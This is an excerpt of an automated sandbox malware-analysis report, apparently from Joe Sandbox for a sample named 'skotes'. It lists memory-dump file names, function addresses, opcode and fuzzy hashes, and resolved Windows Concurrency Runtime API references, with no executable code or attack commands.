Associated: 00000006.00000002.2683876756.0000000000E2E000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2683898524.0000000000E34000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2683921446.0000000000E42000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2683943913.0000000000E47000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2683967721.0000000000E55000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2683989544.0000000000E56000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2684012086.0000000000E57000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2684035267.0000000000E5F000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2684065002.0000000000E66000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2684095310.0000000000E67000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2684120262.0000000000E70000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2684145634.0000000000E72000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2684145634.0000000000EAF000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2684228696.0000000000EDC000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2684252362.0000000000EDD000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2684279870.0000000000EDE000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2684300666.0000000000EE4000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2684326349.0000000000EE6000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2685567728.0000000000EF2000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2685629752.0000000000EF3000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2685676912.0000000000EF4000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2685709596.0000000000EF5000.00000080.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_be0000_skotes.jbxd

Yara matches

Similarity

API ID: Sleep
String ID:
API String ID: 3472027048-0
Opcode ID: 25657b72e2253ac96bf9016fc9df94ec14b90dcf97158f19a9f2a5063334cc5d
Instruction ID: 7fd91719605f5e6ec137389526113ae67bfa63ce0349e9e81a9ce15c3309f4c2
Opcode Fuzzy Hash: 25657b72e2253ac96bf9016fc9df94ec14b90dcf97158f19a9f2a5063334cc5d
Instruction Fuzzy Hash: EFF0D171A40654ABC710BB689D03B2EBBB4EB06B60F900298F821673D1DB701A0447D2

Function 052E0C96 Relevance: .1, Instructions: 129COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.2697077308.00000000052E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 052E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_52e0000_skotes.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c028743f0f9c2cadce50e81a33887bb412ced830624a324cf29c2d760c877dca
Instruction ID: b454369218f098ab06bdaf67443d885010bd1774c4480aa41c566632058c7004
Opcode Fuzzy Hash: c028743f0f9c2cadce50e81a33887bb412ced830624a324cf29c2d760c877dca
Instruction Fuzzy Hash: ED2138AF17C014FD6143C091266CAF63BAFEDD76313B04467F807DAA02D2D51A5B4272

Function 052E0CAD Relevance: .1, Instructions: 110COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.2697077308.00000000052E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 052E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_52e0000_skotes.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1e6083f2074e784a1567295c008a68fb738bd20f2fb43aa2545d3815584b6401
Instruction ID: 793ccae5d0843cc9d08a6d906ea8906f909c68f4af5b80c62f90820b5f3e0162
Opcode Fuzzy Hash: 1e6083f2074e784a1567295c008a68fb738bd20f2fb43aa2545d3815584b6401
Instruction Fuzzy Hash: 651196EF07C110BD6142C0852B6CAF77A6FE9DA7303B08436F80BD6602D2D51A5B5172

Function 052E0CB7 Relevance: .1, Instructions: 110COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.2697077308.00000000052E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 052E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_52e0000_skotes.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: bcc59059f6494ef48d78ac66f7a8b9738361a742f62dae18228b3c901ce6c758
Instruction ID: b8f899d391bf2819867e92a1dc62571bd466c6a9a2adb994bfe78aba9225960a
Opcode Fuzzy Hash: bcc59059f6494ef48d78ac66f7a8b9738361a742f62dae18228b3c901ce6c758
Instruction Fuzzy Hash: 7B21B4EF07C211BDA142C5952A2CAF77A6FE9D77303B08437F807D6502D2D55A1B5272

Function 052E0CE4 Relevance: .1, Instructions: 105COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.2697077308.00000000052E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 052E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_52e0000_skotes.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: dcd4285ae007204bc4fea911c408044fef925c061d4c1294b1cb5f3f6da2700b
Instruction ID: 9eb77e6420e274d4f31d1063210d0f025490b0f9b7aeb1ae53751f42f0c16ef6
Opcode Fuzzy Hash: dcd4285ae007204bc4fea911c408044fef925c061d4c1294b1cb5f3f6da2700b
Instruction Fuzzy Hash: 2B1182EF1BC110BD6142D0852B28AF77A6FE9D77303B08436F80BD6602D2D51B5A5272

Function 052E0CF4 Relevance: .1, Instructions: 100COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.2697077308.00000000052E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 052E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_52e0000_skotes.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5d94b815cdbd2eecdd7eda6dd184203cbebd548284ba673ffc9b6f7ac204ebab
Instruction ID: da8c615de0a34a91813193ff949eacad964fd4576889f45d43b013613d667918
Opcode Fuzzy Hash: 5d94b815cdbd2eecdd7eda6dd184203cbebd548284ba673ffc9b6f7ac204ebab
Instruction Fuzzy Hash: 971186EF1BC110BD6142D4952A28EFB7A6FE9DA7303B0C437F807C6506D2D45A1A5272

Function 052E0D0D Relevance: .1, Instructions: 97COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.2697077308.00000000052E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 052E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_52e0000_skotes.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ccd51672a7ea1a997a63edefec738280bdfd0ceeebc4be6da9cf273a45c1fec5
Instruction ID: 4c72becb427983bd649dd40a5c08e784aed5ac7e9f4f33d7624ec1b7c6720f40
Opcode Fuzzy Hash: ccd51672a7ea1a997a63edefec738280bdfd0ceeebc4be6da9cf273a45c1fec5
Instruction Fuzzy Hash: 4911C2EF0BC010BD6142C0912A68AFB3B6FE9D67303B48437F807C6906D2D91B5B5272

Function 052E0D39 Relevance: .1, Instructions: 83COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.2697077308.00000000052E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 052E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_52e0000_skotes.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b2f015ade7aa9e8af17a62be3ab567dd6d1444df732df762f6c49e7d9347a4c5
Instruction ID: 39aa6fcd161576dcf3adbef8161876ec3efa92deb238fdebbf3d0bb9579da65c
Opcode Fuzzy Hash: b2f015ade7aa9e8af17a62be3ab567dd6d1444df732df762f6c49e7d9347a4c5
Instruction Fuzzy Hash: D2116BBF07C010BDA202D4651A699F73B6FEED73303B4843BF407C6906D2D51A1A5232

Function 052E0D6D Relevance: .1, Instructions: 68COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.2697077308.00000000052E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 052E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_52e0000_skotes.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 21b5c24d4bbec2837f591bf55deff36723a8295a95cdc6aa0cd514043cf9bbba
Instruction ID: 78a11b7c133440039d1a5458c0427ca6109de5d0f206b389c257e25a9aeab3ab
Opcode Fuzzy Hash: 21b5c24d4bbec2837f591bf55deff36723a8295a95cdc6aa0cd514043cf9bbba
Instruction Fuzzy Hash: 75F0A4EF0BC010BD6142C0962A69AF73A6FE9DB7303B48437F40BC5A05C2D51A5A5272

Function 052E0E1F Relevance: .0, Instructions: 45COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.2697077308.00000000052E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 052E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_52e0000_skotes.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 44572922ac0a8fdf188a05be124132e32e42ac945d53017fd19fedde3a7ef423
Instruction ID: c73ad6a170f1690520c5b541d7f2fbab4b1bc7168de8bc14af73f08d99f4e126
Opcode Fuzzy Hash: 44572922ac0a8fdf188a05be124132e32e42ac945d53017fd19fedde3a7ef423
Instruction Fuzzy Hash: 1EF02E960BC1509EC647F96055692F37FAB6F1B33137814B7D1D7C6542D4E0024AC6A2

Function 052E0DAF Relevance: .0, Instructions: 45COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.2697077308.00000000052E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 052E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_52e0000_skotes.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0aaf8baeb34c4b0253b19854fb5e7f73fc8827f0b9f9e0907ffac869ef48a973
Instruction ID: df2d530740540cba4aa98226a4b00604389de6ec94cc507827cfcbfce95adf8d
Opcode Fuzzy Hash: 0aaf8baeb34c4b0253b19854fb5e7f73fc8827f0b9f9e0907ffac869ef48a973
Instruction Fuzzy Hash: 4AF027AB0BC010AD5242E0F5125E3B6795FED2F2303B84437A547D6A05C5C41A264167

Function 052E0DC5 Relevance: .0, Instructions: 44COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.2697077308.00000000052E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 052E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_52e0000_skotes.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c5452a71804a5a71a7cf191dbe664d8ada5dd5f9176c0dbb5bccd1d7adeea658
Instruction ID: d5c58346be77482b5e8e00fdc54eda60ac544c59ec1427978d2bd4334e33a341
Opcode Fuzzy Hash: c5452a71804a5a71a7cf191dbe664d8ada5dd5f9176c0dbb5bccd1d7adeea658
Instruction Fuzzy Hash: 68F05CBA0BC000EE5142D09666196B7765FFE6B3303B4407BF457C7A01C5E416228173

Function 052E0DE2 Relevance: .0, Instructions: 39COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.2697077308.00000000052E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 052E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_52e0000_skotes.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 760408b1b19c48f52afd1a0e0b7c5b844d75cbfeac0e73c9c73c7de401aba3db
Instruction ID: 76f4f7e3d909b210ee1bd8bc015db03a82912eef7e61865fb14d51e2b041c3e9
Opcode Fuzzy Hash: 760408b1b19c48f52afd1a0e0b7c5b844d75cbfeac0e73c9c73c7de401aba3db
Instruction Fuzzy Hash: BDF055A707C0408DE242D0E1122E3B67A8BAF2B330BB8447BE087C7A02C1E842568263

Non-executed Functions

Function 00C00E13 Relevance: 14.3, APIs: 7, Strings: 1, Instructions: 284COMMONLIBRARYCODE

Download Yara Rule

APIs

Concurrency::details::GlobalNode::Initialize.LIBCONCRT ref: 00C00F16
Concurrency::details::GlobalNode::Initialize.LIBCONCRT ref: 00C00F62

Part of subcall function 00C0265D: Concurrency::details::GlobalCore::Initialize.LIBCONCRT ref: 00C02750

Concurrency::details::ResourceManager::AffinityRestriction::FindGroupAffinity.LIBCONCRT ref: 00C00FCE
Concurrency::details::GlobalNode::Initialize.LIBCONCRT ref: 00C00FEA
Concurrency::details::GlobalNode::Initialize.LIBCONCRT ref: 00C0103E
Concurrency::details::GlobalNode::Initialize.LIBCONCRT ref: 00C0106B
Concurrency::details::ResourceManager::CleanupTopologyInformation.LIBCMT ref: 00C010C1

Strings

(, xrefs: 00C00F22

Memory Dump Source

Source File: 00000006.00000002.2680593860.0000000000BE1000.00000040.00000001.01000000.00000007.sdmp, Offset: 00BE0000, based on PE: true

Associated: 00000006.00000002.2678989522.0000000000BE0000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2680593860.0000000000C42000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2680755296.0000000000C49000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2680797474.0000000000C4B000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2680822841.0000000000C57000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2681757009.0000000000DB1000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2681801830.0000000000DB3000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2681834666.0000000000DC5000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2681856278.0000000000DC7000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2681883007.0000000000DC8000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2681883007.0000000000DD0000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2681947828.0000000000DDB000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2681971967.0000000000DDC000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2682002825.0000000000DE5000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2682032299.0000000000DE6000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2682056125.0000000000DE7000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2682146225.0000000000DEB000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2682667892.0000000000E02000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2682717847.0000000000E03000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2683732040.0000000000E0B000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2683784418.0000000000E19000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2683811997.0000000000E2B000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2683848149.0000000000E2D000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2683876756.0000000000E2E000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2683898524.0000000000E34000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2683921446.0000000000E42000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2683943913.0000000000E47000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2683967721.0000000000E55000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2683989544.0000000000E56000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2684012086.0000000000E57000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2684035267.0000000000E5F000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2684065002.0000000000E66000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2684095310.0000000000E67000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2684120262.0000000000E70000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2684145634.0000000000E72000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2684145634.0000000000EAF000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2684228696.0000000000EDC000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2684252362.0000000000EDD000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2684279870.0000000000EDE000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2684300666.0000000000EE4000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2684326349.0000000000EE6000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2685567728.0000000000EF2000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2685629752.0000000000EF3000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2685676912.0000000000EF4000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2685709596.0000000000EF5000.00000080.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_be0000_skotes.jbxd

Yara matches

Similarity

API ID: Concurrency::details::$GlobalInitialize$Node::$AffinityManager::Resource$CleanupCore::FindGroupInformationRestriction::Topology
String ID: (
API String ID: 2943730970-3887548279
Opcode ID: e9df6a4fe2aba0da6f0338d49e4dffa39289402407db6a32fc2f29874cd75e75
Instruction ID: 46a43c97d5df9719b4e69ec1d3bd647a0744f97dd417fce81daf70dcf1c39b96
Opcode Fuzzy Hash: e9df6a4fe2aba0da6f0338d49e4dffa39289402407db6a32fc2f29874cd75e75
Instruction Fuzzy Hash: 4FB18EB4A00616EFDB28CF58D980B7DB7B4FF49304F25416EE955AB281D730AE81CB90

Function 00C01602 Relevance: 13.7, APIs: 9, Instructions: 213memoryCOMMON

Download Yara Rule

APIs

Part of subcall function 00C02CFC: Concurrency::details::ResourceManager::InitializeRMBuffers.LIBCMT ref: 00C02D0F

Concurrency::details::ResourceManager::PreProcessDynamicAllocationData.LIBCONCRT ref: 00C01614

Part of subcall function 00C02E0F: Concurrency::details::ResourceManager::HandleBorrowedCores.LIBCONCRT ref: 00C02E39
Part of subcall function 00C02E0F: Concurrency::details::ResourceManager::HandleSharedCores.LIBCONCRT ref: 00C02EA8

Concurrency::details::ResourceManager::IncreaseFullyLoadedSchedulerAllocations.LIBCMT ref: 00C01746
Concurrency::details::ResourceManager::AdjustDynamicAllocation.LIBCONCRT ref: 00C017A6
Concurrency::details::ResourceManager::PrepareReceiversForCoreTransfer.LIBCMT ref: 00C017B2
Concurrency::details::ResourceManager::DistributeExclusiveCores.LIBCONCRT ref: 00C017ED
Concurrency::details::ResourceManager::AdjustDynamicAllocation.LIBCONCRT ref: 00C0180E
Concurrency::details::ResourceManager::PrepareReceiversForCoreTransfer.LIBCMT ref: 00C0181A
Concurrency::details::ResourceManager::DistributeIdleCores.LIBCONCRT ref: 00C01823
Concurrency::details::ResourceManager::ResetGlobalAllocationData.LIBCMT ref: 00C0183B

Memory Dump Source

Source File: 00000006.00000002.2680593860.0000000000BE1000.00000040.00000001.01000000.00000007.sdmp, Offset: 00BE0000, based on PE: true

Associated: 00000006.00000002.2678989522.0000000000BE0000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2680593860.0000000000C42000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2680755296.0000000000C49000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2680797474.0000000000C4B000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2680822841.0000000000C57000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2681757009.0000000000DB1000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2681801830.0000000000DB3000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2681834666.0000000000DC5000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2681856278.0000000000DC7000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2681883007.0000000000DC8000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2681883007.0000000000DD0000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2681947828.0000000000DDB000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2681971967.0000000000DDC000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2682002825.0000000000DE5000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2682032299.0000000000DE6000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2682056125.0000000000DE7000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2682146225.0000000000DEB000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2682667892.0000000000E02000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2682717847.0000000000E03000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2683732040.0000000000E0B000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2683784418.0000000000E19000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2683811997.0000000000E2B000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2683848149.0000000000E2D000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2683876756.0000000000E2E000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2683898524.0000000000E34000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2683921446.0000000000E42000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2683943913.0000000000E47000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2683967721.0000000000E55000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2683989544.0000000000E56000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2684012086.0000000000E57000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2684035267.0000000000E5F000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2684065002.0000000000E66000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2684095310.0000000000E67000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2684120262.0000000000E70000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2684145634.0000000000E72000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2684145634.0000000000EAF000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2684228696.0000000000EDC000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2684252362.0000000000EDD000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2684279870.0000000000EDE000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2684300666.0000000000EE4000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2684326349.0000000000EE6000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2685567728.0000000000EF2000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2685629752.0000000000EF3000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2685676912.0000000000EF4000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2685709596.0000000000EF5000.00000080.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_be0000_skotes.jbxd

Yara matches

Similarity

API ID: Concurrency::details::Manager::Resource$AllocationCores$Dynamic$AdjustCoreDataDistributeHandlePrepareReceiversTransfer$AllocationsBorrowedBuffersExclusiveFullyGlobalIdleIncreaseInitializeLoadedProcessResetSchedulerShared
String ID:
API String ID: 2508902052-0
Opcode ID: aa9f8f36a8b7b44e1180d435f458fb72d8e9ffd861c0e8264618b64b20c70f21
Instruction ID: 4fe884993dbedc57293a28ac45ac14fd36bf944c4bf2f1b8b400cb662f797912
Opcode Fuzzy Hash: aa9f8f36a8b7b44e1180d435f458fb72d8e9ffd861c0e8264618b64b20c70f21
Instruction Fuzzy Hash: CA816B71E002259FCB19CFA8C984A6DF7F5FF48304B1982ADE815A7781C771AD42CB84

Function 00C0EC48 Relevance: 6.1, APIs: 4, Instructions: 139COMMON

Download Yara Rule

APIs

Concurrency::details::ContextBase::TraceContextEvent.LIBCMT ref: 00C0EC81

Part of subcall function 00C08F2F: Concurrency::details::ContextBase::ThrowContextEvent.LIBCONCRT ref: 00C08F50

Concurrency::details::SchedulerBase::GetInternalContext.LIBCONCRT ref: 00C0ECE7
Concurrency::details::WorkItem::ResolveToken.LIBCONCRT ref: 00C0ECFF
Concurrency::details::WorkItem::BindTo.LIBCONCRT ref: 00C0ED0C

Part of subcall function 00C0E7AF: Concurrency::details::InternalContextBase::ReclaimVirtualProcessor.LIBCONCRT ref: 00C0E7D7
Part of subcall function 00C0E7AF: Concurrency::details::SchedulerBase::TriggerCommitSafePoints.LIBCMT ref: 00C0E86F
Part of subcall function 00C0E7AF: Concurrency::details::SchedulerBase::VirtualProcessorActive.LIBCONCRT ref: 00C0E879
Part of subcall function 00C0E7AF: Concurrency::location::_Assign.LIBCMT ref: 00C0E8AD
Part of subcall function 00C0E7AF: Concurrency::details::ScheduleGroupSegmentBase::AddRunnableContext.LIBCONCRT ref: 00C0E8B5

Memory Dump Source

Source File: 00000006.00000002.2680593860.0000000000BE1000.00000040.00000001.01000000.00000007.sdmp, Offset: 00BE0000, based on PE: true

Associated: 00000006.00000002.2678989522.0000000000BE0000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2680593860.0000000000C42000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2680755296.0000000000C49000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2680797474.0000000000C4B000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2680822841.0000000000C57000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2681757009.0000000000DB1000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2681801830.0000000000DB3000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2681834666.0000000000DC5000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2681856278.0000000000DC7000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2681883007.0000000000DC8000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2681883007.0000000000DD0000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2681947828.0000000000DDB000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2681971967.0000000000DDC000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2682002825.0000000000DE5000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2682032299.0000000000DE6000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2682056125.0000000000DE7000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2682146225.0000000000DEB000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2682667892.0000000000E02000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2682717847.0000000000E03000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2683732040.0000000000E0B000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2683784418.0000000000E19000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2683811997.0000000000E2B000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2683848149.0000000000E2D000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2683876756.0000000000E2E000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2683898524.0000000000E34000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2683921446.0000000000E42000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2683943913.0000000000E47000.00000040.00000001.01000000.00000007.sdmpDownload File
